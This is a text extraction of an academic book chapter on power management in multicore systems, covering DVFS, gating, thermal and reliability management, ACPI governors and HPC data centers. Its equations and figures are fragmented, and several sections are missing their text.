Rogers TG, O’Connor M, Aamodt TM (2012) Cache-conscious wavefront scheduling. In: Proceed-
ings of the IEEE/ACM 45th annual international symposium on microarchitecture (MICRO),
2012 Dec 1–5, Vancouver, BC, Canada
Rogers TG, O’Connor M, Aamodt TM (2013) Divergence-aware warp scheduling. In: Proceedings
of the IEEE/ACM 45th annual international symposium on microarchitecture (MICRO), 2013
Dec 7–11, Davis, CA, USA
Sethia A, Jamshidi D A, Mahlke S (2015) Mascar: speeding up GPU warps by reducing memory
pitstops. In: IEEE 21st international symposium on high performance computer architecture
(HPCA), 2015 Feb 7–11, Burlingame, CA, USA
Tan J, Fu X (2012) RISE: improving the streaming processors reliability against soft errors in
GPGPUs. In: Proceedings of the 21st international conference on parallel architectures and
compilation techniques (PACT), 2012 Sept 19–23, Minneapolis, Minnesota, USA
Top500 (2021) Top 500 supercomputer lists. [Internet]. Available from: https://www.top500.org/
Wong D, Kim NS, Annavaram M (2016) Approximating warps with intra-warp operand value
similarity. In: IEEE international symposium on high performance computer architecture,
March 2016, Barcelona, Spain
Power Management of Multicore Systems
17
Behnaz Ranjbar, Amit Kumar Singh, Siva Satyendra Sahoo,
Piotr Dziurzanski, and Akash Kumar
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 562
Power Dissipation in Multicore Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
Causes and Effects of Power Dissipation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
Power Dissipation in Multicore Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 567
Common Power Reduction Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 568
Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 568
Firmware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 571
Power Management: Embedded Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572
Energy Minimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572
Thermal Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 574
Reliability Improvement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 578
Power Management: Desktop and Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 580
ACPI Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 581
Power Schemes: Governors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 582
Power Management: High-Performance Computing (HPC) Data Centers . . . . . . . . . . . . . . . 583
Fast Heuristics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
Heuristics Using Design-Time Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
Network Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
Abstract
Multicore systems have become the de facto computing platform for electronic
systems, especially since 2005 when the single-core/thread performance hit
the power wall. Consequently, integrating an increasing number of processing
elements on a single integrated circuit has become one of the primary research
goals in both architecture- and semiconductor technology-level design. However,
the increasing power density in multicore systems has also led to increasing
dark silicon, where a majority of the on-chip resources need to be turned off for
avoiding thermal issues. To this end, intelligent power management constitutes
a major focus of research in the system-level design of multicore systems. This
chapter provides a brief overview of the background knowledge and the related
state-of-the-art research. The chapter presents a summary of the causes and
effects of power dissipation in electronic systems along with brief descriptions
of the more commonly used power reduction methods. The chapter then presents
the state-of-the-art research works in power management across different scales
of multicore systems: embedded systems, desktops/client PCs, and HPC servers.
The chapter also provides a brief overview of the more recent topics related to
power management such as power dissipation in 2.5D/3D systems, cross-layer
power management, and Al/ML-based power management.
Keywords
Introduction
Since around 2005, multicore processing has become the primary approach for
utilizing the increasing number of transistors on a semiconductor integrated circuits
(IC) (Held et al. 2006). This has also resulted in a shift of the focus in soft-
ware/algorithm development to improving performance by exploiting Thread Level
Parallelism (TLP). Similarly, the IC manufacturers have focused on integrating more
and more cores onto the same IC to support increased TLP. This continuous effort
– both in terms of software development and hardware design – has translated to an
increasing portion of an IC executing at full throttle continuously. Consequently,
17 Power Management of Multicore Systems 563
Fig. 1 Dark silicon: performance improvement with increasing area budgets and increasing
proportion of dark silicon transistors. (Figure reproduced from Turakhia et al. 2013)
the very phenomenon behind the paradigm shift to multicore computing – high
power density – is increasingly becoming the bottleneck to extracting higher
performance from multicore systems. This phenomenon, sometimes referred to as
dark silicon (Fig. 1), means that given the thermal and power limits of the system,
with each generation of semiconductor process technology, there is a reduction in
the fraction of transistors that can operate at maximum frequency (Kim et al. 2017).
Hence, power management in multicore systems involves extracting the maxi-
mum performance within the power density bounds of the system. The contributions
to the increasing power density can be from multiple processing elements. In
addition to actual computation, multicore processing involves varying degrees
of data sharing and inter-core communication. Hence, varying levels of on-chip
memory and interconnects contribute to the power dissipation, along with the
computation cores. Depending upon the area of application, the multicore archi-
tecture can contain varying types and amounts of computation, communication, and
memory elements. Based on the area of application, multicore systems are broadly
categorized into three types: embedded systems, personal computing systems, and
High Performance Computing (HPC) systems. Depending upon the type of the
system, the goal of power management may vary to some extent. For instance,
in some embedded systems, improving system lifetime can be equally important
as reducing power and energy consumption. Similarly, the methods used for power
reduction for each system may vary depending on the system’s goals. These methods
may involve hardware design, software design, or a combination of both. Similarly,
the design decisions regarding the implementation of these methods may involve
Design Space Exploration (DSE) either during compile time or runtime or a hybrid
of both.
564 B. Ranjbar et al.
For any circuit element, the instantaneous power supplied and/or consumed is the
product of the voltage and the current across the element (Eq. 1). The resulting
energy supplied/consumed over a time interval T , and the average power dissipation
over the same interval can be estimated as shown in Eqs. 2 and 3, respectively.
T
E= P (t)dt (2)
0
T
1
Pavg = P (t)dt (3)
T 0
17 Power Management of Multicore Systems 565
In CMOS-based circuits, the power and energy are modeled as a function of the
load driven by the circuit and the supply voltage. Figure 2 shows a CMOS inverter
driving a capacitive load CL and with a supply voltage VDD . The resulting energy
supplied and stored while CL is charged through the Positive channel Metal Oxide
Semiconductor (PMOS) are given by Eqs. 4 and 5, respectively.
∞ dV
Esupply = CL VDD dt = CL VDD
2
(4)
0 dt
∞ dV 1
Estored = CL V (t)dt = CL VDD
2
(5)
0 dt 2
It can be noted that while half of the supplied energy is stored in the capacitor,
the other half is dissipated as heat in the PMOS. Similarly, during discharging, the
stored energy in the capacitor is dissipated in the Negative channel Metal Oxide
Semiconductor (NMOS). The power dissipation during such switching of the load
constitutes a major component of the total power dissipated in the system. The
various power dissipation mechanisms are categorized as follows:
• Static dissipation: Static power is consumed even when the nodes are not
switching. This occurs primarily due to the leakage current mechanisms and any
contention current in the circuit. Subthreshold leakage is usually the dominant
contributor to the leakage current (and power) and refers to the current flowing
through a transistor even when it is OFF. A potential difference between the
source and drain terminals causes the subthreshold leakage current through
the channel. Similarly, tunneling of the carriers through the dielectric between
the gate terminal and the channel results in the gate leakage current. Other
leakage mechanisms include junction leakage, GIDL, and punchthrough (Kim
et al. 2003). Additionally, some non-CMOS circuits such as pseudo-nMOS gates,
current mode logic, and many analog circuits draw currents even while quiescent.
Such contention current may contribute to static power dissipation. The total
power dissipation can be estimated as shown in Eq. 8.
The power dissipation mechanisms discussed above have been adversely affected
by the continuous quest for higher performance through transistor scaling and archi-
tectural innovations. Increasing the operating clock frequency has been one of the
primary methods of achieving faster computations. However, as shown in Eq. 6, this
results in higher switching power. Consequently, scaling down of the supply voltage,
along with reduced gate dimensions, had been used to maintain the power density
of the ICs. However, since the failure of Dennard scaling (Dennard et al. 1974),
such an approach has proved insufficient. Consequently, some power management
techniques focus on managing the clock frequency based on the application’s
performance requirements. Similarly, since the clock tree forms the highest activity
net in the design, adaptive disabling of the clock network forms an effective power
management method (clock gating). Similar to dynamic dissipation, the static power
dissipation has also increased considerably with technology scaling (Agarwal et al.
2004). For instance, reducing the supply voltage and the corresponding threshold
voltage, Vth , in order to reduce power density, can lead to an exponential increase of
the subthreshold leakage current. Similarly, the gate leakage current due to direct
tunnelling increases exponentially with the reduction in the dielectric thickness
and the increase in potential drop across the oxide. Therefore, unlike in earlier
technologies (>65 nm), reducing the static power dissipation is equally important as
dynamic power. Further, in systems that employ bursts of activity amid longer idle
periods, managing the static power assumes higher priority. As a result, methods
such as power gating and multiple power-down levels, which selectively disable
power supply to multiple domains of the system, are being used extensively in power
management.
The increasing power dissipation has an adverse impact on other quality metrics
of the system. The higher energy consumption results in reduced usability of
portable systems and increased operating costs in HPC systems. Further, the
17 Power Management of Multicore Systems 567
increased power density and higher temperatures increase the demand for cooling
solutions along with possible reduced performance due to thermal throttling (Bhat
et al. 2019). Additionally, higher temperatures exacerbate the reliability problems
of electronic systems. As a result, additional optimization objectives of lifetime
and functional reliability need to be considered during the DSE for power man-
agement (Sahoo et al. 2021b).
similar scheduling, but it can utilize the runtime operating conditions, such as
temperature, to enable better decision-making. However, design/compile-time DSE
allows for more thorough exploration by using complex optimization methods.
Hybrid DSE attempts to combine the best of both the approaches by deriving DSE
models during design/compile time that can be used at runtime, along with dynamic
operation scenario information to provide effective power management.
Hardware
and thermal issues due to the increased power per area. Consequently, thermal-
aware 3D microarchitecture design using thermal herding techniques is being
used (Puttaswamy and Loh 2007). Other core-level hardware methods involve
dynamic reconfiguration of the cores to lower the power dissipation. Kontorinis
et al. (2009), Rodrigues et al. (2011), and Narayanan et al. (2010) propose methods
for adaptively changing the core configuration to provide the best PPW under
varying workloads. Power management techniques for memory usually involve
innovations in the memory hierarchy design or methods to selectively power down
memory/storage components. Smart caches and drowsy caches (Flautner et al. 2002)
rely on predicting cache with low leakage hardware and putting cache lines into
low-power mode, respectively. Similarly, intelligent methods for putting portions
of the Dynamic Random Access Memory (DRAM) into low-power mode have been
proposed. A detailed survey of power management in DRAM can be found in Mittal
(2012). Power management of the interconnect network usually involves an adaptive
selection of routing algorithms and the reduction of the length of the interconnect
wire segment (Kumar et al. 2005).
Firmware
where V , f , Isub , and CL are the voltage, frequency, subthreshold leakage current,
and load capacitance, respectively. Here, the voltage value limits the maximum
frequency. Equation 11 shows the relation between the voltage supply and frequency
value (Kim et al. 2017; Pagani et al. 2018).
(V − Vth )2
f =β (11)
V
where β and Vth are a technology-related constant and the threshold voltage,
respectively. Therefore, decreasing voltage supply leads to a decrease in operational
frequency, which can vary between minimum and maximum bound (Das et al. 2013,
2014a; Ranjbar et al. 2019, 2021). As an example, employing the DVFS technique
in Ranjbar et al. (2019) could reduce the energy consumption by 24% on average,
compared to other recent works.
• Clock Gating (Stop and Go): It is a method of controlling the clock signals to stop
and start dynamic operations, which lead to dynamic power consumption. The
clock signals are entered into computation, such as operational processors and
connected memories, like registers and cache. Therefore, by stopping the clock
signals and entering some (distributed policy) or all (global policy) processors
into sleep mode, less dynamic power is consumed by processors and memories.
When power consumption is high, this method can be applied and switched back
to active mode when the thermal emergency is over. Some recent works Munawar
et al. (2014) and Ranjbar et al. (2021) have used this technique to manage the
power consumption by dynamically controlling the sleep cycles of the cores,
which helps to keep the peak power of the chip under Thermal Design Power
(TDP) and, therefore, maintain it within thermally sound operating conditions.
• Power Gating: It refers to switching off the computational processors and their
connected memories and communication parts when not in use to let them
decrease both static and dynamic power consumption. However, frequent on and
off switches may cause more energy overheads. Therefore, this power-gating
method is best used when the overall power consumption needs to be reduced
significantly.
17 Power Management of Multicore Systems 571
Virtualization
Virtualization is a method employed in data centers to increase utilization of the
computing resources. Virtualization involves deploying multiple Virtual Machine
(VMs) on the same physical server to improve the overall utilization of the resources
– processor cycles or memory space – that might otherwise be lying idle if it is used
by a single user. Modern server management tools such as Microsoft System Center
can be used to recommend VMs migration allowing some physical servers to be
powered down.
Software
Task Migration
Task migration is the runtime moving of a task/application from a hot processor core
to another processor core, i.e., remap and reschedule on a colder processor core to
let the hot processor core cool down. This process helps in dynamically reducing
and balancing the temperature or power consumption across all processor cores in a
platform (Sheikh and Pasha 2018; Henkel and Dutt 2021). This technique is mainly
applied in heterogeneous multicore platforms, in which processor cores consume
different power values.
Task Scheduling
Task scheduling is a process of selecting a task from an application/task set and
determining where (i.e., in which core) and when to execute it (Sheikh and Pasha
2018). Choosing a processor core from a list of available processor cores helps to
reduce power consumption, especially in heterogeneous multicore platforms. The
task scheduling process can be static or dynamic with the aim of power reduction. In
static task scheduling, the task data is known in advance. Thus, the task scheduling
decision (in which processor core and the appropriate time instants to start each
task’s execution on the processor core) can be made at design time to reduce power
consumption. In dynamic task scheduling, the start time instance of tasks and their
locations are decided at runtime. Therefore, the scheduler can change the task
ordering execution to reduce power consumption. In addition, the scheduler can
suspend the running task during its execution or first schedule a task with a low
workload if there is a high-power consumption or thermal emergency. The previous
task scheduled can be resumed when the thermal crisis is over.
Data Forwarding
Data forwarding is a method used to reduce power dissipation due to frequent
data accesses by the L1 cache. Modern multicore systems have a large amount of
resources dedicated to reducing memory latency in the form of caches and the power
572 B. Ranjbar et al.
Energy Minimization
c
574 B. Ranjbar et al.
of data (Singh et al. 2016b; Das et al. 2013, 2014a). Therefore, selecting an
application task mapping can significantly reduce task communication energy
and migration overhead. In particular, using a minimum number of cores (e.g.,
by power gating most cores) to map the dependent tasks in the same core or
neighboring cores is an approach to minimize energy consumption.
• Memory: Memories consume significant energy in embedded systems. Low-
power techniques such as clock gating and DVFS can be applied to memories as
well to reduce energy consumption (Salehi and Ejlali 2014). The leakage power
of memories, such as Static Random Access Memory (SRAM), is high due to
existing additional transistors for each cell (Shafique et al. 2015). Therefore,
the voltage level of memories can be scaled down to reduce the leakage power
and, consequently, the energy consumption of memories. Besides, clock gating
can help to reduce the energy overhead of reading from memory or writing
in memory. It helps by (1) managing the access and locations of bits and (2)
generating appropriate signals to adapt the data at reading and writing memory
ports (Shafique et al. 2015).
In different types of memories, ScratchPad Memory (SPM)s are more energy-
efficient than SRAMs and caches. Since using a low-energy memory is desir-
able for embedded systems, SPM is used as on-chip memory. Although its
static power consumption is high, the read and write time access is very
low, compared to other memories like SRAMs, which leads to low-energy
consumption (Shekarisaz et al. 2021).
Thermal Management
(a) Vn = Vw = Vs = 0, Ve = Vr (b) Vn = Vw = 0, Vs = Ve = Vr
370 400
360
Temperature of core i
Temperature of core i
380
350
340 360
330 340
320
320
310
300 300
0.8V 0.9V 1.0V 1.1V 1.2V 0.8V 0.9V 1.0V 1.1V 1.2V
Voltage of core i Voltage of core i
(c) Vn = 0, Vw = Vs = Ve = Vr (d) Vn = Vw = Vs = Ve = Vr
420 450
400
Temperature of core i
Temperature of core i
380 400
360
340 350
320
300 300
0.8V 0.9V 1.0V 1.1V 1.2V 0.8V 0.9V 1.0V 1.1V 1.2V
Voltage of core i Voltage of core i
Vr = 1.2V Vr = 1.1V Vr = 1.0V Vr = 0.9V Vr = 0.8V
Fig. 7 Impact of varying voltage level on cores’ temperatures (in Kelvin) (Das et al. 2014b)
576 B. Ranjbar et al.
b c
Fig. 8 Impact of considering a TDP constraint on system’s maximum temperature through the use
of power-gating technique. (a) Power traces for two methods of Ranjbar et al. (2022) and Medina
et al. (2018). (b) Temp. profile of Ranjbar et al. (2022) method. (c) Temp. profile of Medina et al.
(2018) method
a b c
Fig. 9 The relation between cores’ temperature and power consumption for method of Medina
et al. (2018) and method of Ranjbar et al. (2021) by using DVFS technique. (a) Power trace of the
big cluster. (b) Temperature trace of A15-core2. (c) Temperature trace of A15-core3
Reliability Improvement
addition, NBTI can degrade the lifetime of caches as well. Balancing the aging of
memory cells in terms of energy consumption leads to a longer lifetime (Shafique
et al. 2015). Besides, reducing the leakage power by controlling the threshold
voltage is a technique that can manage the NBTI (Gnad et al. 2015).
• Functional Reliability: The output correctness of tasks should be investigated
on the whole chip, including computations, memories, and communications.
Soft Error Rate (SER) management is an approach to managing the functional
reliability of computation parts. SER is the probability of soft errors occurring
during the time interval, which depends on the operating frequency (Ma et al.
2018, 2019). It indicates that improving core frequency is effective in enhancing
SER. Therefore, DVFS is one of the low-power techniques to manage functional
reliability. Munawar et al. (2014) explores the impact of V-f scaling on the
functional and thermal reliability. It shows that the fault rate is increased in
low frequencies, which causes a degradation in functional reliability (Sahoo
et al. 2021a). Figure 11 depicts the impact of applying different frequency
levels on fault rate and functional reliability for an application. The fault
rate is computed based on Eq. 12, which is mentioned in Das et al. (2014c).
Here, λ0 , d, f , and fmin are soft error rate at the maximum frequency level,
architecture-specific constant, frequency level, and the minimum frequency level,
respectively. However, thermal reliability (i.e., the lifetime reliability that is
influenced by temperature variation) is decreased at high-frequency levels, which
is in contrast to functional reliability optimization. The thermal reliability at time
instance t due to the EM is given by following equation, where n, E, Ea , β, and
k are material-based constant, energy consumption, activation energy, Weibull
sloop parameter, and Boltzman constant, respectively (Dinakarrao et al. 2019).
The power consumption and temperature would be higher at high frequencies,
which leads to a decrease in thermal reliability according to Eq. 13. Therefore,
selecting the optimum levels of voltage and frequency is crucial. In addition,
1,2E-05 0,99966
Fault Rate
1,0E-05 0,9994
8,1E-06 0,99914
6,1E-06 0,99888
4,1E-06 0,99862
2,1E-06 0,99836
1,0E-07 0,9981
1,5 1,6 1,7 1,8 1,9 2
Frequency Levels (GHz)
Fig. 11 Impact of varying frequency levels on fault rates and functional reliability
580 B. Ranjbar et al.
power gating can help to improve SER by reducing the total utilization of cores
and power gating them.
d(1−f )
λ(f ) = λ0 10 1−fmin (12)
Ea β β
1
R thermal (t) = e−C×t
β ×e k×T emp
, C=( ) (13)
Γ × (1 + β1 ) × E −n
Increasing power consumption may lead to a rise in the Bit Error Rate
(BER) of communication parts and, consequently, unreliable packet transmis-
sion. Therefore, considering a power budget and selecting the optimum route
for data transfer improves the BER and reliable packet transmission (Brahim
and Khan 2006). In memories, consuming low leakage power leads to reliable
read and write operations. Most of the SRAM-based architectures while using
Non Volatile Memory (NVM) have high leakage power consumption and low
reliability. Therefore, proposing a nonvolatile SRAM storage element (i.e., a
memory architecture) with low leakage power can reduce the reliability issues.
To manage the leakage power, if Phase Change Memory (PCM) (one of the most
promising resistive NVMs) is used in memory architectures, power gating can be
used in PCM cells when they do not have any active leakage power (Huang et al.
2014).
Fig. 12 Breakdown of system power conversion with various workload, CPU speeds, and display
brightness levels (Mahesri and Vardhan 2005)
ACPI Standard
From the above-referred experiment, it follows that energy efficiency in the case of
user-centric desktop computers requires DPM and DVFS techniques described ear-
lier in subsections “Dynamic Power Management (DPM)” and “Dynamic Voltage
and Frequency Scaling (DVFS).” Consequently, modern CPUs used in desktop and
server computers follow the OS-based Advanced Configuration and Power Interface
(ACPI) standard (https://uefi.org/). This standard defines mechanisms for putting the
desktop computer as a whole in and out of system sleep states. However, regarding
the subject of this chapter, the most crucial is the ACPI section entitled “Processor
Configuration and Control”, which describes the configuration and control of the
processor’s power and performance states.
In ACPI, C0 is defined as the operating state of a processor, whereas C1, C2,
and C3 are the halt, stop-clock, and sleep states, respectively. Additional C-states
have been introduced by several chip vendors, such as C6 in Intel Xeon, which is
known as deep power conservation state. The Haswell processors can enter C7, a
deep power down state, whereas even lower power dissipation is achievable in the
deeper power down states labelled as C8/C9/C10 in the 8th and 9th generation of
Intel Core processor families and Intel Xeon E processor families.
582 B. Ranjbar et al.
While running in the operating state C0, a core can be in one of the predetermined
power-performance states known as P-states that select the DVFS level. Reduced
performance and lower energy dissipation are characteristics of P-states with higher
indices. Various parameters supplied by monitoring infrastructure tools and services
can be used to make an informed decision on voltage scalings, such as infrastructure
utilization or latency between the input and output timestamps.
In the presence of the DVFS facilities, selecting a core for a task becomes a
more difficult problem even for multicores with homogeneous architecture since
their cores can function at a varied voltage and frequency levels at the same time
instant. Such scheduling policies considering various voltage and frequency levels
are referred to as voltage scheduling.
In a multicore CPU, a task can be assigned to a core statically or dynamically.
The former is recommended when the workload is known ahead of time, whereas
dynamic allocation, which occurs after a task is released, is the only option
for workloads that are not known in advance. Dynamic task mapping on CPUs
that enables DVFS is even more difficult, because not only must the target core
be selected but also the level of accessible voltage. The scheduling methods in
Windows or Linux (from kernel version 2.6) that use dynamic frequency scaling
for contemporary multicore processors from Intel (SpeedStep technology) and
AMD (PowerNow! or Cool’n’Quiet technology) are good examples of this type
of allocation.
In contemporary operating systems used in desktops and servers, the available
power schemes for CPUs are termed governors. In Linux, the performance governor
runs the CPU at the maximum frequency, whereas the powersave governor activates
the minimum frequency. In the case of a high load, the ondemand governor selects
P0 immediately, whereas the conservative governor progressively modifies the
current P-state. The purpose of these latest two heuristics is to keep CPU utilization
near 90% by reactively decreasing or raising frequency with particular heuristics.
The governor proposed in Ayoub et al. (2011), which after being implemented in
Linux Kernel and tested on a 32 nm Intel hexa-core dual-socket Westmere Xeon,
managed to reduce the standard deviation from target performance by more than
90% over the state-of-the-art policies while reducing average power by 17% while
applied for Spec2K and SpecWeb benchmarks.
Per-core or per-chip (chip-wide) custom governors are available. In Kim et al.
(2008), an interesting comparison of per-chip and per-core DVFS is shown,
according to which per-core DVFS saves roughly 20% more energy than a standard
chip-wide DVFS using off-chip regulators. Despite such improvement potential,
per-core DVFS has not been implemented widely in hardware. For example, the
active cores even in the third generation of Intel x86 processors (Ivy Bridge) had to
work with the same frequency and voltage in steady states, whereas their competing
cores in AMD processors could operate with various frequencies, but still with a
17 Power Management of Multicore Systems 583
single voltage value, required by the core in the fastest P-state. The fourth Intel
x86 generation CPUs (Haswell) were the first to offer per-core DVFS capability in
production. This support was removed from later generations Sky Lake and Kaby
Lake. The authors of Acun et al. (2019) adopted a fine-grained function-level per-
core DVFS technique to construct an intelligent energy-efficient runtime module.
Over the initial iterations, that module discovered the energy-optimal frequency for
each function of the analyzed application and then used that optimal frequency in
subsequent iterations. On Haswell CPUs, they achieved a 4 percent to 35 percent
energy reduction over chip-level DVFS while maintaining performance (Acun et al.
2019).
In Zhu et al. (2020), authors explored the relationship between per-core DVFS
and phase scaling of the voltage regulator (VR) to achieve system-level energy
optimization. The proposed convex-optimization model has been split into offline
and online stages, which reduced the optimization time without incurring energy
overhead. Their proposed model has been tested on platforms with four, eight, and
sixteen cores where it lowered the system energy usage by up to 22.4 percent with
good scalability on the testing data.
An HPC data center connects a set of nodes (servers) (Singh et al. 2015b), where
each node contains a set of cores within a chip and the cores communicate via
an interconnection network and the nodes communicate via a high-speed network,
for example, InfiniBand. The size and performance of these systems continue to
increase but at the expense of high-energy consumption. Therefore, it is important
to take measures that can help reduce the energy consumption.
The energy is consumed to execute the queued jobs that arrive periodically or
randomly. The data center companies make profit by executing the jobs that are
associated with some values. Value is typically assigned based on expected profit
earned from the completion of the job. In data centers, typically, the scheduling of
jobs is influenced by their value, i.e., a resource management tries to maximize the
profits by allocating the limited resources to the highest-value jobs in the queue.
However, with the rise of power/energy consumed by data centers, the resource
management needs to take energy management into account.
The literature has advanced with techniques to improve the energy efficiency
of the data center. The popular techniques are based on mainly Dynamic Power
Management (DPM) and Dynamic Voltage Frequency Scaling (DVFS) principles.
Recently, virtual machines (VMs) consolidation that focuses on reducing the
number of servers to run VMs has become a major focus area (Sun et al. 2015).
To achieve energy efficiency and/or high profit, existing approaches apply a
variety of techniques, for example, (1) fast heuristics to quickly find practical
allocations for the dynamically arriving jobs as they reduce the delay in allocations,
(2) design-time profiling to reduce runtime computational complexity (Singh et al.
584 B. Ranjbar et al.
2015b), (3) machine learning, and (4) novel data center network (DCN) tech-
nologies, leveraging emerging interconnection paradigms such as millimeter-wave
(mmWave) interconnects, Ethernet and wireless. The details of these techniques are
as follows.
Fast Heuristics
The use of design-time profiling results in the runtime resource management process
has resulted in better joint optimization of both the profit and energy as heavy
computations are shifted to design time (Singh et al. 2015b). These approaches
have helped to make fast decisions at runtime and thus in developing fast runtime
heuristics, mentioned in the previous subsection. Further, design-time profiling has
helped in adapting the allocations during tasks’ execution (Singh et al. 2016a).
Although such design-time profiling has shown promising results, the technique
is not flexible to all the varying situations as it performs profiling for a set of
situations and assume that there is little deviation in resources required by the jobs in
the system. To overcome these disadvantages, algorithms that account for varying
situations can be designed. It can be done by taking a full history of information
about jobs in real time. This has led to the development of various machine learning
approaches.
17 Power Management of Multicore Systems 585
Machine Learning
Network Technologies
Since network consumes significant amount of energy, novel data center network
(DCN) technologies have been explored to reduce energy consumption. Millimeter-
wave (mmWave) interconnects have been proposed to reduce the power consump-
tion of the networking equipment. Most of these works are for wireless data centers
and propose interconnecting entire racks of servers as units with 60 GHz wireless
links. Alternatively, server-centric wireless DCNs where direct wireless links are
used for server-to-server communication have also been explored (Mamun 2021).
These wireless data center architectures are promising alternative to traditional
wired architecture for HPC computing for achieving further reduction in power
consumption.
2.5D/3D Systems
Cross-Layer Approach
Traditional DSE for power management – both during compile time and runtime
– involved optimization of the methods for a single abstraction layer. In contrast,
a cross-layer approach involves joint optimization across multiple layers. For
instance, Sahoo and Kumar (2021a) presents optimization of the choices for DVFS
and multiple implementations of a task, with varying activity factors. However, the
joint exploration also results in the explosion of the related design space. As a result,
novel approaches to the search for the optimal design points are being adopted for
cross-layer DSE for power and other quality metrics (Carter et al. 2010; Sahoo
et al. 2016). These include constrained decoding (Sahoo and Kumar 2021a), Multi-
Objective Evolutionary Algorithms (MOEA) (Sahoo et al. 2019, 2020) and Monte
Carlo Tree Search (MCTS) (Sahoo and Kumar 2021b), among others.
Emerging Technologies
The last decade has seen rapid proliferation of electronic systems across application
areas, powered by various emerging technologies – both in devices and applications.
The emerging applications technologies such as edge-AI, Internet of Thing (IoT),
etc., have been mainly driven by the rapid strides in the field of AI/ML and
have their own unique set of power-management challenges such as battery-less
edge devices, computation/communication trade-offs for IoT, etc. Further, Artificial
Intelligence (AI) algorithms such as Deep Neural Networks (DNN) require simpler
computations and far more memory accesses compared to more traditional compu-
tation tasks. Hence, the power management of noncore and uncore components has
become equally critical. The emerging device technologies are driven by the need
to reduce leakage power at shrinking transistor dimensions.
Conclusion
With the perpetual quest for high performance and the resulting technology, scaling
power management has become one of the primary system-level design objectives.
The recent proliferation of AI/ML into every sphere of our lives, and the need for
high-performance systems to execute the related applications, multicore systems
will need to scale across multiple dimensions – number of cores, heterogeneity
of cores, microarchitecture, packaging, etc. Implementing both traditional and
emerging applications in multicore systems varying across these aspects provides
ample scope for innovations in power management. To this end, this chapter
provides an overview of the fundamental aspects, the state of the art, and a peak
into the future of power management in multicore systems.
Glossary
AI Artificial Intelligence.
ALU Algorithm Logic Unit.
BER Bit Error Rate.
CMOS Complementary Metal-Oxide Semiconductor.
DFS Dynamic Frequncy Scaling.
DNN Deep Neural Networks.
DPM Dynamic Power Management.
DRAM Dynamic Random Access Memory.
DSE Design Space Exploration.
DSPs Digital Signal Processing blocks.
DTM Dynamic Thermal Management.
DVFS Dynamic Voltage and Frequency Scaling.
DVS Dynamic Voltage Scaling.
EM Electromigration.
FPGA Field-Programmable Gate Array.
GPU Graphics Processing Unit.
HPC High Performance Computing.
IC integrated circuits.
IoT Internet of Thing.
IP Intellectual Property.
IPC Instruction Per Cycle.
LSQ Load Store Queue.
MCTS Monte Carlo Tree Search.
MOEA Multi-Objective Evolutionary Algorithms.
NBTI Negative Bias Temperature Instability.
NMOS Negative channel Metal Oxide Semiconductor.
NVM Non Volatile Memory.
588 B. Ranjbar et al.
OS Operating System.
PCM Phase Change Memory.
PMC Performance Monitorng Counters.
PMOS Positive channel Metal Oxide Semiconductor.
PPW Performance Per Watt.
RTL Register Transfer Level.
SER Soft Error Rate.
SPM ScratchPad Memory.
SRAM Static Random Access Memory.
TC Thermal Cycling.
TDDB Time Dependent Dielectric Breakdown.
TDP Thermal Design Power.
TLP Thread Level Parallelism.
VMs Virtual Machine.
References
Acun B, Chandrasekar K, Kale LV (2019) Fine-grained energy efficiency using per-core DVFS
with an adaptive runtime system. In: 2019 Tenth International Green and Sustainable Computing
Conference (IGSC), pp 1–8. https://doi.org/10.1109/IGSC48788.2019.8957174
Agarwal A, Kim CH, Mukhopadhyay S, Roy K (2004) Leakage in nano-scale technologies:
mechanisms, impact and design considerations. In: Proceedings of the 41st Annual Design
Automation Conference, DAC’04. Association for Computing Machinery, New York, pp 6–11.
https://doi.org/10.1145/996566.996571
Al Faruque M, Jahn J, Ebi T, Henkel J (2010) Runtime thermal management using software agents
for multi-and many-core architectures. IEEE Des Test Comput 27(6):58–68
Amrouch H, Ebi T, Schneider J, Parameswaran S, Henkel J (2013) Analyzing the thermal
hotspots in fpga-based embedded systems. In: 2013 23rd International Conference on Field
programmable Logic and Applications. IEEE, pp 1–4
Aroca RV, Gonçalves LMG (2012) Towards green data centers: a comparison of x86
and ARM architectures power efficiency. J Parallel Distrib Comput 72(12):1770–1780.
https://doi.org/10.1016/j.jpdc.2012.08.005, https://www.sciencedirect.com/science/article/pii/
S0743731512002122
Ayoub RZ, Ogras U, Gorbatov E, Jin Y, Kam T, Diefenbaugh P, Rosing T (2011) OS-level power
